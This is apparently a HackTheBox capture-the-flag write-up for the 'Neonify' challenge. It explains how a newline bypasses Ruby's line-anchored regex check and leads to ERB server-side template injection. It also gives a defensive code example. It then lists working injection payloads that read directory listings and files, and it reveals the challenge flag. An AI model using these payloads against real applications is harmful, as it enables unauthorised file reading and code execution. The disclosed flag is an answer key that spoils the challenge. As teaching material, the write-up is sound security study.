HackTheBox – Neonify

1. Overview

This is a web challenge that involves a regex anchoring vulnerability in Ruby that results in SSTI in ERB, a Ruby templating engine.

You may download the files here.

Below is the source code of the page index.erb:

If we submit a string, the value will be processed by neon.rb. This file also handles the GET request.

We can see that if we send a value, it is sent as a POST request. The sent value will be inside params[:neon], which is checked via regex.

If the value passes the check, it is printed on the new page. As ERB with binding is used, it is susceptible to Server Side Template Injection (SSTI), since it renders whatever content we give it as a template. The only “protection” is that regex check.

2. Ruby REGEX vulnerability

Unlike in other languages, in Ruby ^ and $ match at the start and end of any line rather than of the whole string, so it is not safe to use them to anchor an input check: the check can easily be bypassed by inserting a newline character \n (but not the Windows line ending \r\n, since \r is not a line terminator for these anchors). Ref: https://stackoverflow.com/questions/577653/difference-between-a-z-and-in-ruby-regular-expressions
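The following Ruby is an added example written for this write-up and is not the challenge's neon.rb. The allow-list pattern is an assumption standing in for the challenge's real check (which is not reproduced above); it contrasts a check anchored with ^ and $ against one anchored with \A and \z, and shows a rendering path that treats the submitted value as data instead of as template source.

```ruby
require 'erb'

# Hypothetical allow-list, assumed for this example; the challenge's actual
# pattern is not shown in the write-up.
LINE_ANCHORED   = /^[a-zA-Z0-9 ]+$/     # ^ and $ match at line boundaries in Ruby
STRING_ANCHORED = /\A[a-zA-Z0-9 ]+\z/   # \A and \z match the start and end of the string

# Returns true when the value passes the line-anchored check (the weak form).
def line_anchored_ok?(value)
  !!(value =~ LINE_ANCHORED)
end

# Returns true when the value passes the string-anchored check (the hardened form).
def string_anchored_ok?(value)
  !!(value =~ STRING_ANCHORED)
end

# Rendering in the style the write-up describes: the submitted value becomes
# the template source itself, so any <%= %> inside it is evaluated.
def render_neon_unsafe(neon)
  ERB.new(neon).result(binding)
end

# Hardened rendering: the template text is fixed and the user value is passed
# in as a local and HTML-escaped, so it is never parsed as ERB.
SAFE_TEMPLATE = ERB.new('<h1><%= ERB::Util.html_escape(neon) %></h1>')

def render_neon(neon)
  SAFE_TEMPLATE.result_with_hash(neon: neon)
end

# Runs a few constructed inputs through both checks and returns the results,
# so the difference between the two anchor styles is visible side by side.
def compare_checks
  inputs = [
    "hello world",          # plain text: both checks accept
    "hello\n<%= 1 %>",      # newline after a clean first line: only \A..\z rejects
    "hello\r\n<%= 1 %>",    # \r is not in the allow-list, so even ^..$ rejects
    "",                     # empty: both reject
  ]
  inputs.map do |value|
    { input: value,
      line_anchored: line_anchored_ok?(value),
      string_anchored: string_anchored_ok?(value) }
  end
end

if __FILE__ == $PROGRAM_NAME
  compare_checks.each { |r| p r }
  puts render_neon("hello\n<%= 1 %>")
end
```

The string-anchored check rejects the multi-line input outright, and the fixed template escapes the value rather than evaluating it, so either change on its own would have closed the path this write-up uses; applying both gives defence in depth.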

Since we know it is vulnerable to SSTI and we know how to bypass the check, it is time for a proof-of-concept. I used Burp Suite, which makes it easier to send a newline \n character.

Below is the content I sent. I used two spaces; the second space is later replaced by a newline character \n.

neon=  <%= self.class.name %>

Send it to Repeater and, in the hex view, change the second space to 0x0A (the newline character \n).

Remember to URL-encode the string. We should get the class name “NeonControllers”, matching what we see in the neon.rb file.

3. Get the flag

Next, I listed the files in the directory, since HackTheBox sometimes appends random values to the flag file name. Ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#ruby

neon= 
<%= Dir.entries('.') %>

Since we now know the file is flag.txt, we can read the flag, which is HTB{r3pl4c3m3n7_s3cur1ty}.

neon= 
<%= File.open('flag.txt').read %>

Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
